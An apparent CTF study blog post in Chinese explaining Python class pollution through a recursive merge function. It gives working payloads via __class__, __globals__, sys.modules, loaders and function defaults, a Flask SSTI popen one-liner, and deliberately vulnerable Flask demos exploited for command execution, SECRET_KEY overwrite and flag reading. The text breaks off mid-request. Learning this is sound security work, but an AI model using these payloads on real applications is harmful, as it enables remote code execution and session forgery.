友情提示:本文最后更新于 416 天前,文中的内容可能已有所发展或发生改变。 0x01 前言 baseCTF里面的那几道我都是现学现做,只是知道污染怎么操作,并不知道为啥可以污染,这次让我彻底弄懂它!
0x02 question 父子类的继承 概念 父类是被继承的类,也称为基类或超类。父类中的属性和方法会被子类继承。
子类是从父类继承而来的类,也称为派生类。子类可以拥有父类的所有属性和方法,还可以添加新的属性和方法,或者重写父类的方法。
同时还有几个重要方法,这里直接引用一位师傅所写的
在Python中,定义类是通过class关键字,class后面紧接着是类名,紧接着是(object),表示该类是从哪个类继承下来的,所有类的本源都是object类 可以自由地给一个实例变量绑定属性,像js 由于类可以起到模板的作用,因此,可以在创建实例的时候,把一些我们认为必须绑定的属性强制填写进去。通过定义一个特殊的__init__方法,在创建实例的时候,就把类内置的属性绑上 注意到__init__方法的第一个参数永远是self,表示创建的实例本身,因此,在__init__方法内部,就可以把各种属性绑定到self,因为self就指向创建的实例本身。 当我们定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到 判断一个变量是否是某个类型可以用isinstance()判断。 普通继承 在子类中,你可以使用 super() 函数来调用父类的方法。这在子类需要扩展而不是完全重写父类方法时特别有用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
class Animal :
def __init__ ( self , name ):
self . name = name
def speak ( self ):
raise NotImplementedError ( "Subclass must implement this abstract method" )
def eat ( self ):
print ( f " { self . name } is eating." )
class Dog ( Animal ):
def __init__ ( self , name , breed ):
super () . __init__ ( name ) # 调用父类的构造函数
self . breed = breed
def speak ( self ):
print ( f " { self . name } says Woof!" )
def fetch ( self ):
print ( f " { self . name } is fetching the ball." )
class Cat ( Animal ):
def __init__ ( self , name , color ):
super () . __init__ ( name ) # 调用父类的构造函数
self . color = color
def speak ( self ):
super () . speak () # 调用父类的 speak 方法
print ( f " { self . name } says Meow!" )
def scratch ( self ):
print ( f " { self . name } is scratching the furniture." )
instance = Cat ( "无情" , "black" )
print ( instance . name )
看看就行感觉没啥好讲的,看就能看懂
多重继承 一个子类可以继承多个父类
1
2
3
4
5
6
7
8
9
10
11
class Flyer :
def fly ( self ):
print ( f " { self . name } is flying." )
class Bird ( Animal , Flyer ):
def __init__ ( self , name , species ):
super () . __init__ ( name ) # 调用父类的构造函数
self . species = species
def speak ( self ):
print ( f " { self . name } chirps." )
方法的解析顺序我们靠mro()来查看
1
2
print ( Bird . mro ())
# [<class '__main__.Bird'>, <class '__main__.Animal'>, <class '__main__.Flyer'>, <class 'object'>]
计算规则是这样
子类优先于父类 :子类的方法和属性优先于父类的方法和属性。父类的顺序 :如果一个类有多个父类,那么这些父类的顺序会保持不变。唯一性 :MRO 列表中的每个类只出现一次。但是这个实际的作用我还不知道是有啥,可能是效率问题?
污染过程解析 先看个最简单的demo
1
2
3
4
5
6
7
class test ():
pass
a = test ()
a . __class__ = 'polluted'
print ( a . __class__ )
这里直接污染发现报错了
1
TypeError: __class__ must be set to a class, not 'str' object
那么此时我们如果要污染属性的话就去寻找其内置属性即可,__qualname__是用于访问类的名称
1
2
3
4
5
6
7
8
class test ():
pass
a = test ()
print ( a . __class__ )
a . __class__ . __qualname__ = 'polluted'
print ( a . __class__ )
而也就是说污染其实就是赋值,那么为了搞清楚原理,我们自己写段代码来调试就可以了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
class father :
secret = "hello"
class son_a ( father ):
pass
class son_b ( father ):
pass
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
instance = son_b ()
payload = {
"__class__" :{
"__base__" :{
"secret" : "world"
}
}
}
print ( son_a . secret )
print ( instance . secret )
merge ( payload , instance )
print ( son_a . secret )
print ( instance . secret )
然后进行debug就可以懂了,这里我还是自己试一次,毕竟是初学者
但是我发现个问题,我使用VScode始终进入不了merge函数,那没办法,我就下载一个pycharm吧,不过先讲讲函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
欧克那么下来我们开始调试,打断点在merge(payload,instance)处
可以看到我们的键为'__class__',值为{'__base__':{'secret':'world'}},下一步由于dst不为字典直接到了elif
继续之后,发现键为'__base__',值为{'secret':'world'}
仍然是跳回到了这一步,继续看,再回来时,键为'secret',值为'world',现在的值已经不是字典了,所以直接跳转到了setattr,进行赋值
赋值之后还有一个东西,请看jpg
可以看到此时也是dst直接就指向地址了
那么我们就成功的通过当前类的__base__去污染了secret(现在这三个类的secret 都是world ),不过这仅仅只是一个内置属性,那能不能实现最大的利用直接污染object呢
前面几步都在正常进行,可是到了后面,发现个问题,也就是我们刚才所有的回退那两步发现没了,从而直接报错,也就是说污染失败,得出结论
object的属性不能污染
不过那回退那三步 ,又是怎么回事呢,我们再写一个多层的来试试,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
class father :
secret = "hello"
nested = {
"level1" : {
"level2" : {
"level3" : "initial_value"
}
}
}
class son_a ( father ):
pass
class son_b ( father ):
pass
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
instance = son_b ()
payload = {
"__class__" : {
"__base__" : {
"secret" : "world" ,
"nested" : {
"level1" : {
"level2" : {
"level3" : "updated_value" ,
"new_level4" : "new_value"
},
"new_level5" : "new_value"
}
}
}
}
}
print ( son_a . secret )
print ( instance . secret )
print ( instance . nested )
merge ( payload , instance )
print ( son_a . secret )
print ( instance . secret )
print ( instance . nested )
换成这个代码进行debug发现会在原地跳伍次
找规律都找的出来了吧,就是因为我们的payload深度所导致的,查找payload深度的方法
这样子debug,看看什么时候会完全的往外跳,记录下跳的次数即为payload深度
不过这样的话又要牵扯到python的循环了,那么查找官方文档,其中我们知道
循环是进行迭代调用的,从一个最简单的demo
1
2
3
4
num = [ 1 , 2 , 3 , 4 , 5 ]
for i in num :
print ( i )
这里进行调试会发现,每次进入之后跳出循环都会在for i in num:跳一下
那么回到我们的test
1
2
3
4
5
6
7
8
9
10
11
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
这里第一次通过elif进入merge函数,第二次也是,总共合起来就是三次循环,所以跳出时,也是需要原地跳三次才可跳出
那么再看一个最简单的demo吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from flask import Flask , request , jsonify
import os
app = Flask ( __name__ )
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and isinstance ( v , dict ):
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and isinstance ( v , dict ):
merge ( getattr ( dst , k ), v )
else :
setattr ( dst , k , v )
class Demo :
def __init__ ( self , cmd ):
self . cmd = cmd
def execute ( self ):
return os . popen ( self . cmd ) . read ()
@app.route ( '/merge_and_execute' , methods = [ 'POST' ])
def merge_and_execute ():
data = request . json
if not data or 'cmd' not in data :
return jsonify ({ "error" : "Invalid input" }), 400
cmd_data = data [ 'cmd' ]
a = Demo ( 'echo Hello' )
merge ( cmd_data , a )
result = a . execute ()
return jsonify ({ "result" : result })
if __name__ == '__main__' :
app . run ( host = '127.0.0.1' , debug = True )
直接污染cmd就可以RCE了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /merge_and_execute HTTP/1.1
Host: 127.0.0.1:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Length: 24
Content-Type: application/json
{"cmd":{"cmd":"whoami"}}
属性污染以及寻找 这里就神似SSTI中我们如何寻找可利用的方法了
原型链 如上面的,通过继承关系写出poc即可,当然与此同时,并不只是我们自定义的属性可以污染,还有内置属性也可以,这里可以以这个属性为例子
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
class father :
secret = "hello"
class son_a ( father ):
pass
class son_b ( father ):
pass
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
instance = son_b ()
payload = {
"__class__" : {
"__base__" : {
"secret" : "world" ,
"__str__" : "polluted!"
}
}
}
print ( father . __str__ )
merge ( payload , instance )
print ( father . __str__ )
成功污染,好玩好玩
非继承 globals 我们在flask中进行SSTI注入的时候一般就会先去寻找globals,这里也是一样,我们直接去找就行了,不过注意的一点就是,如果我们不进行重写__init__的话,是找不到的
未重写
1
2
3
4
5
6
7
8
9
10
11
12
class MyClass :
pass
print ( type ( MyClass . __init__ ))
try :
print ( MyClass . __init__ . __globals__ )
# 访问不存在的属性会抛出AttributeError
except AttributeError as e :
print ( e )
# <class 'wrapper_descriptor'>
# 'wrapper_descriptor' object has no attribute '__globals__'
重写过后
1
2
3
4
5
6
7
8
class MyClass :
def __init__ ( self ):
self . x = 10
print ( type ( MyClass . __init__ ))
print ( MyClass . __init__ . __globals__ )
# <class 'function'>
# {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000001BDD0B71700>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'D:\\PyCharm 2023.3.2\\object\\pythonProject\\test.py', '__cached__': None, 'MyClass': <class '__main__.MyClass'>}
同时这里我们也发现,当其未被重写时,它的类型是 wrapper_descriptor,没有__globals__,被重写会变为function,有__globals__,请看demo
1
2
3
4
5
6
7
def demo ():
pass
class MyClass :
def __init__ ( self ):
pass
print ( demo . __globals__ == globals () == MyClass . __init__ . __globals__ )
说了这么多别给你说迷糊了,我们的目的就是得到__globals__,OK那么继续看
从SSTI的角度(flask)
1
{{ cycler . __init__ . __globals__ . __builtins__ [ '__import__' ]( 'os' ) . popen ( 'whoami' ) . read ()}}
那么我们进入cycler源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
class Cycler ( MutableSequence ):
def __init__ ( self , ** kwargs ):
self . _keys = []
self . _length = 1
self . _by_key = {}
for key , val in kwargs . items ():
if not hasattr ( val , '__getitem__' ) or not hasattr ( val , '__len__' ):
raise TypeError ( f " { key !r} does not support indexing/length" )
self . _keys . append ( key )
self . _by_key [ key ] = val
self . _length = lcm ( self . _length , len ( val ))
self . _index = 0
# 其他方法省略...
很明显看到__init__是被重写了的,其他的不放了(太长了)
那么我们为啥要找这个东西,这再说说
{{ cycler.__init__.__globals__ }} 会返回 cycler 模块中 Cycler 类的 __init__ 方法的全局命名空间。这个全局命名空间是一个字典,字典的内容如下
内置函数和模块 :如 __builtins__。导入的模块 :如 math(如果 cycler 模块导入了 math 模块)。定义的类和函数 :如 Cycler 类本身,以及其他在 cycler 模块中定义的类和函数。其他全局变量 :如 cycler 模块中定义的其他变量。理清楚了,来看demo,直接利用__globals__污染属性和类属性
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
name = "baozongwi"
class son_a ():
secret = "nonono"
class son_b ():
def __init__ ( self ):
pass
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
a = son_a ()
b = son_b ()
payload = {
"__init__" :{
"__globals__" :{
"name" : "12SqweR" ,
"a" :{
"secret" : "good!!!"
}
}
}
}
print ( name )
print ( a . secret )
merge ( payload , b )
print ( name )
print ( a . secret )
这里我们就成功污染了,但是实际情况中,常常是存在于内置模块或者是第三方模块之中,此时我们就不太好找关系了。不过还是有很多办法的
sys 那么就要使用sys,因为sys模块的modules属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块,并随着模块的导入而动态更新。
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import sys
import son
class son_a ():
secret = "nonono"
class son_b ():
def __init__ ( self ):
pass
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
payload = {
"__init__" :{
"__globals__" :{
"sys" :{
"modules" :{
"son" :{
"son_test" :{
"secret" : "good!!!"
}
}
}
}
}
}
}
b = son_b ()
print ( son . son_test . secret )
merge ( payload , b )
print ( son . son_test . secret )
son.py
1
2
class son_test :
secret = "nonono"
这里就以导入第三方块示例了
Loader加载器 __loader__ 是一个属性,它存在于每个已导入的模块对象中。这个属性指向一个加载器对象,该对象负责加载该模块。在一些场景中常常伴有着importlib模块的使用,那么这个时候我们就可以使用loader加载器来进行sys模块的加载从而达到目的
加载器这个东西可以简单看看
BuiltinImporter :
1
2
3
import math
print ( math . __loader__ )
# <class '_frozen_importlib.BuiltinImporter'>
SourceFileLoader :
1
2
3
import son # 自定义模块才行
print ( son . __loader__ )
# <_frozen_importlib_external.SourceFileLoader object at 0x0000020819FA10D0>
ExtensionFileLoader :
1
2
3
import numpy
print ( numpy . __loader__ )
# <_frozen_importlib_external.SourceFileLoader object at 0x000001C8DC2710D0>
只要是BuiltinImporter的加载器都行,所以这里还有spec 也能用
那么来看demo吧
son.py
1
2
class son_test ():
secret = "nonono"
test.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import importlib
import son
class son_a ():
secret = "nonono"
class son_b ():
def __init__ ( self ):
pass
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
print ( "sys" in dir ( __import__ ( "importlib" )))
payload = {
"__init__" :{
"__globals__" :{
"importlib" :{
"__loader__" :{
"__init__" :{
"__globals__" :{
"sys" :{
"modules" :{
"son" :{
"son_test" :{
"secret" : "good"
}
}
}
}
}
}
}
}
}
}
}
b = son_b ()
print ( son . son_test . secret )
merge ( payload , b )
print ( son . son_test . secret )
然后__spec__
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import math
import son
class son_a ():
secret = "nonono"
class son_b ():
def __init__ ( self ):
pass
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
payload = {
"__init__" :{
"__globals__" :{
"math" :{
"__spec__" :{
"__init__" :{
"__globals__" :{
"sys" :{
"modules" :{
"son" :{
"son_test" :{
"secret" : "good"
}
}
}
}
}
}
}
}
}
}
}
b = son_b ()
print ( son . son_test . secret )
merge ( payload , b )
print ( son . son_test . secret )
大家比照一下,很明显__spec__限制更少,我在实验的时候用math的loader来加载sys,结果弄半天后面一直不成功,于是看看有没有结果false
1
print ( "sys" in dir ( __import__ ( "math" )))
函数形参默认值替换 __defaults__是一个元组 ,用于存储函数或方法的默认参数值。当我们去定义一个函数时,可以为其中的参数指定默认值。这些默认值会被存储在__defaults__元组 中。我们可以通过这个属性来污染参数默认值
1
2
3
4
5
def a ( x , y = 2 , z = 3 ):
pass
print ( a . __defaults__ )
# (2,3)
这是一个函数,有三个参数,其中一个必填参数(x),还有两个是可选参数(y,z),再多看看,把__default__看懂
1
2
3
4
5
def func_b ( var_1 , var_2 ):
pass
print ( func_b . __defaults__ )
# None
那么再来看个特殊的
/ 之前的参数 :这些参数是 位置参数 (positional-only parameters)。 它们只能通过位置传递,不能通过关键字传递。 / 和 * 之间的参数 :这些参数既可以是 位置参数 ,也可以是 关键字参数 。 它们可以通过位置或关键字传递。 * 之后的参数 :这些参数是 关键字参数 (keyword-only parameters)。 它们只能通过关键字传递,不能通过位置传递。 有默认值但是不计入__defualts__ 1
2
3
4
5
def a ( x , / , y = 2 , * , z = 3 ):
pass
a ( x = 1 )
# TypeError: a() got some positional-only arguments passed as keyword arguments: 'x'
1
2
3
4
5
def a ( x , / , y = 2 , * , z = 3 ):
pass
a ( 1 , 4 , 6 )
# TypeError: a() takes from 1 to 2 positional arguments but 3 were given
1
2
3
4
5
6
def a ( x , / , y = 2 , * , z = 3 ):
print ( x , y , z )
pass
a ( 1 , 4 , z = 6 )
print ( a . __defaults__ )
欧克懂了之后来污染吧
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def demo ( x , name = "baozongwi" , age = "99" ):
if name != "12SqweR" :
print ( x )
else :
if age != "99" :
print ( __import__ ( "os" ) . popen ( x ) . read ())
class A :
def __init__ ( self ):
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
a = A ()
b = demo
payload = {
"__init__" :{
"__globals__" :{
"demo" :{
"__defaults__" :
( "12SqweR" , "100" )
}
}
}
}
print ( b . __defaults__ )
merge ( payload , a )
print ( b . __defaults__ )
c = demo ( "whoami" )
这个__defaults__的写法一定要对,是元组,不然就失败,当然如果是True或者False的话,就可以直接写
这里给看看我的错误写法,
首先我加了大括号,不是元组,然后modules里面还只有模块,所以直接鸭溪啦
后来我查看一些污染类文章发现用sys一样可以
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import sys
def demo ( x , name = "baozongwi" , age = "99" ):
if name != "12SqweR" :
print ( x )
else :
if age != "99" :
print ( __import__ ( "os" ) . popen ( x ) . read ())
class A :
def __init__ ( self ):
pass
def merge ( src , dst ):
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
a = A ()
b = demo
payload = {
"__init__" : {
"__globals__" : {
"sys" : {
"modules" : {
"__main__" : {
"demo" : {
"__defaults__" : ( "12SqweR" , "100" )
}
}
}
}
}
}
}
print ( b . __defaults__ ) # 输出: ('baozongwi', '99')
merge ( payload , a )
print ( b . __defaults__ ) # 输出: ('12SqweR', '100')
c = demo ( "whoami" )
除了__defaults__还有__kwdefaults__,大差不差,只不过这个是字典,cancan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def func_a ( var_1 , var_2 = 2 , var_3 = 3 ):
pass
def func_b ( var_1 , / , var_2 = 2 , var_3 = 3 ):
pass
def func_c ( var_1 , var_2 = 2 , * , var_3 = 3 ):
pass
def func_d ( var_1 , / , var_2 = 2 , * , var_3 = 3 ):
pass
print ( func_a . __kwdefaults__ )
#None
print ( func_b . __kwdefaults__ )
#None
print ( func_c . __kwdefaults__ )
#{'var_3': 3}
print ( func_d . __kwdefaults__ )
#{'var_3': 3}
发现只有关键字参数的默认值才会返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def demo ( x , * , name = "baozongwi" , age = "99" ):
if name != "12SqweR" :
print ( x )
else :
if age != "99" :
print ( __import__ ( "os" ) . popen ( x ) . read ())
class A :
def __init__ ( self ):
pass
def merge ( src , dst ):
# 遍历字典中的所有键值对
for k , v in src . items ():
# 检查dst是否为字典
if hasattr ( dst , '__getitem__' ):
# 如果存在键k并且v是一个字典
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
# 如果dst是一个对象并且有属性k
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
# 将v赋值给k
setattr ( dst , k , v )
a = A ()
b = demo
payload = {
"__init__" :{
"__globals__" :{
"demo" :{
"__kwdefaults__" : dict ( name = "12SqweR" , age = "100" )
# "__kwdefaults__": {"name":"12SqweR","age":"100"}
}
}
}
}
print ( b . __kwdefaults__ )
merge ( payload , a )
print ( b . __kwdefaults__ )
c = demo ( "whoami" )
关键信息替换 session_key 有些时候当我们不知道key的时候,并且审计代码或者尝试,发现可以污染的时候,那我们可以直接污染为自己想要的可控值,那么此时session就可以任意伪造了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from flask import Flask , request
import json
app = Flask ( __name__ )
app . config [ 'SECRET_KEY' ] = "who are you"
def merge ( src , dst ):
# Recursive merge function
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
class cls ():
def __init__ ( self ):
pass
instance = cls ()
@app.route ( '/' , methods = [ 'POST' , 'GET' ])
def index ():
print ( app . config [ 'SECRET_KEY' ])
if request . data :
merge ( json . loads ( request . data ), instance )
return "[+]Config: %s " % ( app . config [ 'SECRET_KEY' ])
app . run ( host = "0.0.0.0" )
直接污染
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 189
{
"__init__":{
"__globals__":{
"app":{
"config":{
"SECRET_KEY":"mine"
}
}
}
}
}
_got_first_request 这里对版本有要求我们给自己降个级
1
2
3
4
5
pip install werkzeug==2.0.3
pip install Flask==2.1.0
pip install --upgrade werkzeug
pip install --upgrade Flask
等会升级回来就好了
_got_first_request 是 Flask 应用内部的一个属性,用于跟踪是否已经处理了第一个请求。这个属性主要用于实现 before_first_request 装饰器的功能,但在 Flask 2.2.0 版本中,before_first_request 装饰器已经被移除,因此 _got_first_request 也失去了其主要用途。
就是场景就是有些时候为了安全,会只允许一些特定操作,比如必须在before_first_request 装饰器实现一些东西,看看这个装饰器的源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
class Flask ( WerkzeugApp ):
# ... 其他代码 ...
def __init__ ( self , import_name , static_url_path = None , static_folder = 'static' ,
static_host = None , host_matching = False , subdomain_matching = False ,
template_folder = 'templates' , instance_path = None ,
instance_relative_config = False , root_path = None ):
# ... 初始化代码 ...
self . before_first_request_funcs = []
# ... 其他初始化代码 ...
def before_first_request ( self , f ):
"""Register a function to be run before the first request only."""
self . before_first_request_funcs . append ( f )
return f
def _got_first_request ( self ):
if self . _got_first_request :
return
self . _got_first_request = True
for func in self . before_first_request_funcs :
func ()
def process_response ( self , response ):
"""Can be overridden in order to modify the response object before it's sent to the client."""
# ... 其他代码 ...
self . _got_first_request ()
# ... 其他代码 ...
return response
def preprocess_request ( self ):
"""Called before the actual request dispatching and will ensure that
:meth:`before_request` functions and URL value matching are done. If
this returns a response the regular request handling is skipped and the
returned response is sent instead.
"""
# ... 其他代码 ...
self . _got_first_request ()
# ... 其他代码 ...
return None
主要就是这里
1
2
3
4
5
6
def _got_first_request ( self ):
if self . _got_first_request :
return
self . _got_first_request = True
for func in self . before_first_request_funcs :
func ()
也就是说我们如果要调用这个装饰器中的函数,必须让_got_first_request为false
这里我们如果可以污染的话就非常good
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from flask import Flask , request
import json
app = Flask ( __name__ )
def merge ( src , dst ):
# Recursive merge function
for k , v in src . items ():
if hasattr ( dst , '__getitem__' ):
if dst . get ( k ) and type ( v ) == dict :
merge ( v , dst . get ( k ))
else :
dst [ k ] = v
elif hasattr ( dst , k ) and type ( v ) == dict :
merge ( v , getattr ( dst , k ))
else :
setattr ( dst , k , v )
class cls ():
def __init__ ( self ):
pass
instance = cls ()
flag = "Is flag here?"
@app.before_first_request
def init ():
global flag
if hasattr ( app , "special" ) and app . special == "U_Polluted_It" :
flag = open ( "flag" , "rt" ) . read ()
@app.route ( '/' , methods = [ 'POST' , 'GET' ])
def index ():
if request . data :
merge ( json . loads ( request . data ), instance )
global flag
setattr ( app , "special" , "U_Polluted_It" )
return flag
app . run ( host = "0.0.0.0" )
还要创建一个flag文件,自己随便来
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
